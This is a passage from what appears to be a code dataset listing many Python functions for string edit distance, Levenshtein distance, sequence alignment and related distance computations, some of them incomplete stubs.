output is on\n if verbose == 2:\n print()\n print_matrix(s, t, dist)\n\n return dist[row][col], dist", "def levenshtein(proposed, gold, normalize=False):\n lev_densities = []\n for x, y in zip(proposed, gold):\n score = editdistance.eval(x, y)\n if normalize:\n score /= len(y)\n lev_densities.append(score)\n return sum(lev_densities) / 
len(lev_densities)", "def levenshtein_distance(s, t, alphabet=string.printable, **weight_dict):\n if len(s) == 0 or len(t) == 0:\n return max([len(s), len(t)])\n\n rows = len(s) + 1\n cols = len(t) + 1\n\n w = dict((x, (1, 1, 1)) for x in alphabet + alphabet.upper())\n if weight_dict:\n w.update(weight_dict)\n\n dist = [[0 for _ in range(cols)] for _ in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for row in range(1, rows):\n dist[row][0] = dist[row - 1][0] + w[s[row - 1]][0]\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for col in range(1, cols):\n dist[0][col] = dist[0][col - 1] + w[t[col - 1]][1]\n\n for col in range(1, cols):\n for row in range(1, rows):\n deletes = w[s[row - 1]][0]\n inserts = w[t[col - 1]][1]\n subs = max((w[s[row - 1]][2], w[t[col - 1]][2]))\n if s[row - 1] == t[col - 1]:\n subs = 0\n else:\n subs = subs\n dist[row][col] = min(\n dist[row - 1][col] + deletes,\n dist[row][col - 1] + inserts,\n dist[row - 1][col - 1] + subs,\n ) # substitution\n\n return dist[row][col]", "def editDistance(l1, l2):\n cache = [[None for i in range(len(l2) + 1)] for j in range(len(l1) + 1)]\n \n for row in range(len(l1) + 1):\n for col in range(len(l2) + 1):\n if row == 0 and col == 0:\n cache[row][col] = 0\n elif col == 0:\n cache[row][col] = row\n elif row == 0:\n cache[row][col] = col\n elif l1[row - 1] == l2[col - 1]:\n cache[row][col] = cache[row - 1][col - 1]\n else:\n a = cache[row - 1][col]\n b = cache[row][col - 1]\n c = cache[row - 1][col - 1]\n cache[row][col] = min(a, b, c) + 1\n\n return findResult(l1, l2, cache)", "def _edit_dist(s1, s2):\r\n dist = 0\r\n for i in range(len(s1)):\r\n if s1[i] != s2[i]:\r\n dist += 1\r\n return dist", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert len(dist_mat.size()) == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n dist_ap, relative_p_inds = torch.max(\n dist_mat[is_pos].contiguous().view(N, -1), 1, keepdim=True)\n dist_an, relative_n_inds = torch.min(\n dist_mat[is_neg].contiguous().view(N, -1), 1, keepdim=True)\n\n dist_ap = dist_ap.squeeze(1)\n dist_an = dist_an.squeeze(1)\n\n if return_inds:\n ind = (labels.new().resize_as_(labels)\n .copy_(torch.arange(0, N).long())\n .unsqueeze(0).expand(N, N))\n p_inds = torch.gather(\n ind[is_pos].contiguous().view(N, -1), 1, relative_p_inds.data)\n n_inds = torch.gather(\n ind[is_neg].contiguous().view(N, -1), 1, relative_n_inds.data)\n p_inds = p_inds.squeeze(1)\n n_inds = n_inds.squeeze(1)\n return dist_ap, dist_an, p_inds, n_inds\n\n return dist_ap, dist_an", "def nn_match(descs1, descs2):\n # diff = descs1[:, None, :] - descs2[None, :, :]\n # diff = np.linalg.norm(diff, ord=2, axis=2)\n # indices = np.argmin(diff, axis=1)\n\n flann = cv2.FlannBasedMatcher_create()\n matches = flann.match(descs1.astype(np.float32), descs2.astype(np.float32))\n indices = [x.trainIdx for x in matches]\n\n return indices", "def _pairwise_distance(self, src_embeds, vocab_embeds, squared=False):\n # compute square norm to avoid compute all the directions\n vocab_sq_norm = vocab_embeds.norm(p=2, dim=-1) ** 2\n src_sq_norm = src_embeds.norm(p=2, dim=-1) ** 2\n\n # dot product\n dot_product = self._pairwise_dot_product(src_embeds, vocab_embeds)\n \n # reshape for broadcasting\n vocab_sq_norm = vocab_sq_norm.unsqueeze(0).unsqueeze(0) # 1, 1, vocab size\n 
src_sq_norm = src_sq_norm.unsqueeze(2) # batch, seq length, 1\n\n # compute squared difference\n sq_norm = vocab_sq_norm + src_sq_norm - 2 * dot_product\n if squared:\n return sq_norm\n else:\n # relu + epsilon for numerical stability\n sq_norm = F.relu(sq_norm) + 1e-20\n \n # take the square root\n return sq_norm.sqrt()", "def damerau_levenshtein_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(damerau_levenshtein_distance(s1, s2)) / max_cost", "def line_edits(s1, s2):\n l1 = s1.splitlines()\n l2 = s2.splitlines()\n \n result = editDistance(l1, l2)\n \n result = result[::-1]\n \n return result", "def distance_mentions(m_i, m_j):\n return abs(m_i.id - m_j.id)", "def edit_distance(str1, str2, reconstruct_answer=False, method=alignments.Levinshtein(),\n swap_case_on_mismatch=True):\n method = alignments.Levinshtein() if method is None else method\n return align(str1, str2, reconstruct_answer, method, swap_case_on_mismatch)", "def indels_junctions_exons_mismatches(\n cigar, md, pos, seq, drop_deletions=False, junctions_only=False\n):\n insertions, deletions, junctions, exons, mismatches = [], [], [], [], []\n cigar = re.split(r'([MINDS])', cigar)[:-1]\n md = parsed_md(md)\n seq_size = len(seq)\n cigar_index, md_index, seq_index = 0, 0, 0\n max_cigar_index = len(cigar)\n while cigar_index != max_cigar_index:\n if cigar[cigar_index] == 0:\n cigar_index += 2\n continue\n if cigar[cigar_index + 1] == 'M':\n aligned_base_cap = int(cigar[cigar_index])\n aligned_bases = 0\n while True:\n try:\n aligned_bases += int(md[md_index])\n if aligned_bases <= aligned_base_cap:\n md_index += 1\n except ValueError:\n # Not an int, but should not have reached a deletion\n assert md[md_index] != '^', '\\n'.join(\n ['cigar and md:',\n ''.join(cigar), ''.join(md)]\n )\n if not junctions_only:\n mismatches.append(\n (pos + aligned_bases,\n seq[seq_index + aligned_bases])\n )\n correction_length = len(md[md_index])\n m_length = aligned_base_cap - aligned_bases\n if correction_length > m_length:\n md[md_index] = md[md_index][:m_length]\n aligned_bases = aligned_base_cap\n else:\n aligned_bases += correction_length\n md_index += 1\n if aligned_bases > aligned_base_cap:\n md[md_index] = aligned_bases - aligned_base_cap\n break\n elif aligned_bases == aligned_base_cap:\n break\n # Add exon\n exons.append((pos, pos + aligned_base_cap))\n pos += aligned_base_cap\n seq_index += aligned_base_cap\n elif cigar[cigar_index + 1] == 'N':\n skip_increment = int(cigar[cigar_index])\n # Add junction\n junctions.append((pos, pos + skip_increment,\n seq_index, seq_size - seq_index))\n # Skip region of reference\n pos += skip_increment\n elif cigar[cigar_index + 1] == 'I':\n # Insertion\n insert_size = int(cigar[cigar_index])\n insertions.append(\n (pos - 1, seq[seq_index:seq_index + insert_size])\n )\n seq_index += insert_size\n elif cigar[cigar_index + 1] == 'D':\n assert md[md_index] == '^', '\\n'.join(\n ['cigar and md:',\n ''.join(cigar), ''.join(md)]\n )\n # Deletion\n delete_size = int(cigar[cigar_index])\n md_delete_size = len(md[md_index + 1])\n assert md_delete_size >= delete_size\n deletions.append((pos, md[md_index + 1][:delete_size]))\n if not drop_deletions: exons.append((pos, pos + delete_size))\n if md_delete_size > delete_size:\n # Deletion contains a junction\n md[md_index + 1] = md[md_index + 1][delete_size:]\n else:\n md_index += 2\n # Skip deleted part of reference\n pos += delete_size\n else:\n # Soft clip\n assert cigar[cigar_index + 1] == 'S'\n # 
Advance seq_index\n seq_index += int(cigar[cigar_index])\n cigar_index += 2\n '''Merge exonic chunks/deletions; insertions/junctions could have chopped\n them up.'''\n new_exons = []\n last_exon = exons[0]\n for exon in exons[1:]:\n if exon[0] == last_exon[1]:\n # Merge ECs\n last_exon = (last_exon[0], exon[1])\n else:\n # Push last exon to new exon list\n new_exons.append(last_exon)\n last_exon = exon\n new_exons.append(last_exon)\n return insertions, deletions, junctions, new_exons, mismatches", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). 
Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def Levenshtein(a, b):\n v0 = list(range(len(b)+1))\n v1 = list(range(len(b)+1)) # Or whatever.\n\n for i in range(len(a)):\n v1[0] = i + 1\n\n for j in range(len(b)):\n deletionCost = v0[j + 1] + 1\n insertionCost = v1[j] + 1\n substitutionCost = v0[j] if a[i] == b[j] else v0[j]+1\n v1[j + 1] = min(deletionCost, insertionCost, substitutionCost)\n\n v1, v0 = v0, v1\n return v0[len(b)]", "def edit_distance_from_aln_strings(str1, str2):\n assert len(str1) == len(str2)\n edit_distance = 0\n in_gap = False\n\n for i, char1 in enumerate(str1):\n if char1 == \"-\" or str2[i] == \"-\":\n if not in_gap:\n in_gap = True\n edit_distance += 1\n else:\n in_gap = False\n\n if char1 != str2[i]:\n edit_distance += 1\n\n return edit_distance", "def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True):\n return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def edit_distance(str1, str2):\n\n if not str1:\n return len(str2)\n if not str2:\n return len(str1)\n\n DP = [[-1 for __ in str2] for ___ in str1]\n DP[0][0] = 0 if str1[0] == str2[0] else 1\n\n\n for x, let1 in enumerate(str1):\n startat = 0\n if x == 0:\n startat = 1\n for y, let2 in enumerate(str2[startat:], startat):\n minimum = float('inf')\n if x != 0:\n minimum = min(DP[x-1][y] + 1, minimum)\n if y != 0:\n minimum = min(DP[x-1][y-1] + (0 if let1 == let2 else 1), minimum)\n if y != 0:\n minimum = min(DP[x][y-1] + 1, minimum)\n\n DP[x][y] = minimum\n\n return DP[len(str1) - 1][len(str2) - 1]", "def hard_example_mining(dist_mat, is_pos, is_neg):\n\n assert len(dist_mat.size()) == 2\n\n # `dist_ap` means distance(anchor, positive)\n # both `dist_ap` and `relative_p_inds` with shape [N]\n dist_ap, _ = torch.max(dist_mat * is_pos, dim=1)\n # `dist_an` means distance(anchor, negative)\n # both `dist_an` and `relative_n_inds` with shape [N]\n inf = dist_mat.max() + 1\n dist_an, _ = torch.min(dist_mat * is_neg + is_pos * inf, dim=1)\n\n return dist_ap, dist_an", "def seq_dist(i1: int, s1: t.Collection[SeqGene],\n i2: int, s2: t.Collection[SeqGene]) -> t.Tuple[int, int, float]:\n m1, m2 = map(\n lambda s: dict(chain.from_iterable(\n ((pos, aa) for pos, aa in zip(g.Pos, g.Seq)) for g in s)),\n [s1, s2])\n d = 0.\n for p in set(m1) | set(m2):\n if p in m1 and p in m2 and m1[p] == m2[p]:\n continue\n d += 1\n return i1, i2, d", "def _get_distance_by_span(matched_positions, forms):\n if len(set(forms[matched_positions])) < 2:\n return 0\n if len(matched_positions) == 2:\n return _get_trivial_distance(matched_positions)\n start_pos = np.min(matched_positions)\n end_pos = np.max(matched_positions)\n if start_pos != end_pos:\n return np.abs(end_pos - start_pos) + 1\n return 0", "def editing_distance(str1: str, str2: str) -> int:\r\n if not str1 and not str2:\r\n return 0\r\n if not str1:\r\n return len(str2)\r\n if not str2:\r\n return len(str1)\r\n if str1[0] == str2[0]:\r\n return min(editing_distance(str1[1::], str2[1::]), 1 + editing_distance(str1, str2[1::]),\r\n 1 + editing_distance(str1[1::], str2))", "def min_edit_distance(x: str, y: str, return_matrix: bool = False) -> object:\n m = 
_get_edit_distance_matrix(x, y)\n\n for i in range(1, len(x) + 1):\n\n for j in range(1, len(y) + 1):\n # How do we obtain the m[i][j] value?\n # We need to look at three positions while iterating:\n # 1. m[i - 1][j -1]\n # 2. m[i][j - 1]\n # 3. m[i - 1][j]\n\n # x[i - 1] and y[j - 1] are the characters.\n\n # Note: i and j start from 1.\n\n # If the characters are equal, we don't need to perform any of the\n # operations: insertion, deletion or substitution, and the minimum\n # edit distance to convert x[i - 1] to y[j - 1] is the same as the\n # one to convert x[i] to s[j], because, as stated above, x[i - 1]\n # and y[j - 1] are equal, so we don't have to perform any other\n # operation.\n if x[i - 1] == y[j - 1]:\n m[i][j] = m[i - 1][j - 1]\n else:\n m[i][j] = min(m[i - 1][j - 1] + 1, m[i - 1]\n [j] + 1, m[i][j - 1] + 1)\n\n return m[len(x)][len(y)] if not return_matrix else m", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert dist_mat.ndimension() == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n tmp = Variable(dist_mat.data.new().resize_as_(dist_mat.data).fill_(1e4))\n\n dist_ap, p_inds = torch.max(dist_mat - is_neg.float() * tmp, 1, keepdim=False)\n dist_an, n_inds = torch.min(dist_mat + is_pos.float() * tmp, 1, keepdim=False)\n if return_inds:\n return dist_ap, dist_an, p_inds, n_inds\n return dist_ap, dist_an", "def iterated_lev_dist(a, b, tolerance=5):\n lenA, lenB = _len(a), _len(b)\n\n # Optimize away edge cases...\n if a == b:\n return 0\n\n # Lower bound is length diff, quit if length difference is too big\n if _abs(lenA - lenB) > tolerance:\n return -1\n\n # Quit early if we know the minimum number of substitutions to make will\n # already be too big\n min_substitutions = _len(_symdif({*a}, {*b})) / 2\n if min_substitutions > tolerance:\n return -1\n\n # We need 2 arrays, 1 larger than the compared\n slots = _len(b) + 1\n v0 = list(range(slots))\n v1 = [0] * slots\n\n # print(' ', ' '.join(t))\n # Walking over rows. 
Each row represents one step along the source string.\n # Last cell of last row gives us the edit distance.\n for i, A in enumerate(a):\n # First cell of each row is for comparison against empty string\n # the cost is always equal to length of source string walked so far\n v1[0] = i + 1\n\n for j, B in enumerate(b):\n delCost = v0[j + 1] + 1 # j+1 since the first value in the row\n # is distance from an empty str\n subCost = v0[j] + (A != B) # substitution\n insCost = v1[j] + 1 # the insert cost is always at least 1\n v1[j + 1] = _min(delCost, insCost, subCost)\n\n # When moving to next row, current row\n v0 = _lcopy(v1)\n # print(A, v0)\n return v0[-1]", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n else:\n if str1[row - 1] == str2[col - 1]:\n dp_table[row][col] = dp_table[row - 1][col - 1]\n else:\n replace = dp_table[row - 1][col - 1]\n insert = dp_table[row][col - 1]\n delete = dp_table[row - 1][col]\n dp_table[row][col] = min(replace, insert, delete) + 1\n \n return dp_table[rows-1][cols-1]", "def levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = [] \n for i in range(m+1):\n d.append([i]) \n del d[0][0] \n for j in range(n+1):\n d[0].append(j) \n for j in range(1,n+1):\n for i in range(1,m+1):\n if str1[i-1] == str2[j-1]:\n d[i].insert(j,d[i-1][j-1]) \n else:\n minimum = min(d[i-1][j]+1, d[i][j-1]+1, d[i-1][j-1]+2) \n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist)/lensum\n return {'distance':ldist, 'ratio':ratio}", "def traj_loc_distance(trajs, locs):\n return distance_matrix(\n np.asarray([t.last_pos() for t in trajs]),\n locs[:,2:4]\n )", "def opt_dist_2d(seq, ks):\n # all chars - required 1s - minimum 0 separators\n additional_0s = len(seq) - sum(ks) - (len(ks) - 1)\n return _dp_opt_dist_2d(tuple(seq), ks, 0, 0, additional_0s)", "def edit_distance(str1, str2):\r\n pass", "def lev_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.Levenshtein()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the distance measure.\n return measure.get_raw_score(s1, s2)", "def levenshteinDistance(s, t, asRatioOfMax = False):\n\n if s == None:\n s = \"\"\n if t == None:\n t = \"\"\n\n if t == s:\n return 0\n if len(s) == 0:\n return len(t)\n if len(t) == 0:\n return len(s)\n\n v0 = [x for x in range(len(t)+1)]\n v1 = [0 for x in range(len(t)+1)]\n\n for i, si in enumerate(s):\n\n v1[0] = i + 1\n\n for j, tj in enumerate(t):\n\n if si == tj:\n cost = 0\n else:\n cost = 1\n\n j1 = v1[j] + 1\n j2 = v0[j + 1] + 1\n j3 = v0[j] + cost\n \n if j1 < j2 and j1 < j3:\n v1[j + 1] = j1\n continue\n \n if j2 < j3:\n v1[j+1] = j2\n else:\n v1[j+1] = j3\n \n v0 = v1.copy()\n\n if not asRatioOfMax:\n return v1[len(t)]\n\n return 1 - v1[len(t)]/max([len(t), len(s)])", "def pairwise(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[0 for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = i\n\n for j in range(1, n + 1):\n D[0][j] = j\n\n # Recurrence\n for i in 
range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1] + 1\n delete = D[i-1][j] + 1\n substitute = D[i-1][j-1] + (0 if (string_v[i-1] == string_w[j-1]) else 1)\n # Set D[i][j] to the max of the recurrences\n if insert < delete and insert < substitute:\n D[i][j] = insert\n elif delete < substitute:\n D[i][j] = delete\n else:\n D[i][j] = substitute\n\n return D[m][n]", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = [g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def model_average_levenshtein(sampled_levenshtein, model_rows='all', deg=5):\n n = sampled_levenshtein.shape[0]\n assert n >= 25, \"\"\"Modeling is not supported for n < 25.\n The exact expected distances are known for these lengths: {}\"\"\".format(\n codegolf_ref)\n if model_rows == 'all':\n model_rows = np.arange(25, n)\n else:\n model_rows = np.array(model_rows)\n model_rows = model_rows[model_rows >= 25]\n assert len(model_rows) > 0, \"\"\"Modeling is not\n supported for n < 25. 
The exact expected distances\n are known for these lengths: {}\"\"\".format(\n codegolf_ref)\n\n n_rows = len(model_rows)\n coeffs = np.empty(shape=(n_rows, deg + 1))\n mses = np.empty(n_rows)\n for i, row in enumerate(model_rows):\n c, m = _fit_poly(sampled_levenshtein[row, :row+1])\n coeffs[i] = c\n mses[i] = m\n return model_rows, coeffs, mses", "def test_indices_distance(self):\n maze = Maze(10, 10)\n\n for test in range(1000):\n self.assertTrue(\n (abs(maze.entrance[0] - maze.exit[0]) +\n abs(maze.entrance[1] - maze.exit[1])) >= 9)", "def edit_distance(str1, str2):\n if len(str1) == 0 or len(str2) == 0:\n return max(len(str1), len(str2))\n if str1[-1] == str2[-1]:\n return edit_distance(str1[:-1], str2[:-1])\n insert = edit_distance(str1, str2[:-1])\n delete = edit_distance(str1[:-1], str2)\n replace = edit_distance(str1[:-1], str2[:-1])\n return min(insert, delete, replace) + 1", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix", "def levenshtein_distance(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n if n1 == 0 and n2 == 0:\n return 0\n\n # if n1 == 0 or n2 == 0:\n # return max(n1, n2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n for i in range(n1 + 1):\n for j in range(n2 + 1):\n if i == 0 and j == 0: # [0,0]\n continue\n elif i == 0: # most top row\n c = s2[j - 1]\n dp[i][j] = insert[c] if c in insert else insert_default\n dp[i][j] += dp[i][j - 1]\n elif j == 0: # most left column\n c = s1[i - 1]\n dp[i][j] = delete[c] if c in delete else delete_default\n dp[i][j] += dp[i - 1][j]\n else:\n c1, c2 = s1[i - 1], s2[j - 1]\n insert_cost = insert[c2] if c2 in insert else insert_default\n delete_cost = delete[c1] if c1 in delete else delete_default\n substitute_cost = substitute[c1][c2] \\\n if c1 in substitute and c2 in substitute[c1] else substitute_default\n\n if c1 == c2:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i][j - 1] + insert_cost,\n dp[i - 1][j] + delete_cost,\n dp[i - 1][j - 1] + substitute_cost)\n return dp[n1][n2]", "def edit_distance(str_1, str_2):\n return edit_distance_dp(str_1, len(str_1), str_2, len(str_2))", "def Loss_s2s(score, g_pnt_idxs):\r\n # WHERE string part\r\n loss = 0\r\n\r\n for b, g_pnt_idxs1 in enumerate(g_pnt_idxs):\r\n ed = len(g_pnt_idxs1) - 1\r\n score_part = score[b, :ed]\r\n loss += F.cross_entropy(score_part, torch.tensor(g_pnt_idxs1[1:]).to(device)) # +1 shift.\r\n return loss", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # 
s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def _get_edit_distance_matrix(x: str, y: str) -> list:\n matrix = [[-1 for _ in range(len(y) + 1)] for _ in range(len(x) + 1)]\n\n for j in range(len(matrix[0])):\n matrix[0][j] = j\n\n for i, _ in enumerate(matrix):\n matrix[i][0] = i\n\n return matrix", "def isOneEditDistance(self, s, t):\n ns = len(s)\n nt = len(t)\n if abs(ns-nt) >= 2:\n return False\n\n l = min(ns, nt)\n for i in range(l):\n if s[i] != t[i]:\n if ns == nt:\n # whether match by replace\n return s[:i] == t[:i] and s[i+1:] == t[i+1:]\n elif ns + 1 == nt:\n # whether match by remove one from t\n return s[:i] == t[:i] and s[i:] == t[i+1:]\n else:\n # ns == nt + 1\n # whether match by remove one from s\n return s[:i] == t[:i] and s[i+1:] == t[i:]\n return True", "def scr_calc(m,i,j):\n #Indices contributing value at any given position in matrix. \n diag = m[i-1][j-1] \n up = m[i-1][j]\n left = m[i][j-1]\n #Takes highest out of all 3 options above.\n highest = max(diag,up,left)\n \n #Matches.\n if strA[i] == strB[j]: \n m[i,j] = diag + 1\n \n #Non matches.\n if strA[i] != strB[j]:\n m[i,j] = highest - 1\n #Guarantees no value in matrix falls below 0.\n if m[i,j] < 0:\n m[i,j] = 0", "def calculate_edit_distance(str1, str2, pos1, pos2):\n \n result = None\n \n # If either of the strings is an empty string, return the length\n # of the other string. \n if pos1 == 0:\n result = pos2\n elif pos2 == 0:\n result = pos1\n \n # Check if the last character of the strings are identical. If\n # they are, move on to the next character.\n elif str1[pos1-1] == str2[pos2-1]:\n result = calculate_edit_distance(str1, str2, pos1-1, pos2-1)\n\n # If the last characters are not the same, one character is\n # different between these two strings at the pos 1 and 2. Move on\n # to the next character, and add one to the distance.\n else:\n # Iteratively, find which case holds true. 
The options are:\n # - insertion in string1\n # - deletion in string1\n # - substitution between strings 1 and 2 at pos1 and pos2.\n # Choose the minimum of the three cases.\n result = 1 + min(calculate_edit_distance(str1, str2, pos1, pos2-1),\n calculate_edit_distance(str1, str2, pos1-1, pos2),\n calculate_edit_distance(str1, str2, pos1-1, pos2-1))\n \n return result",
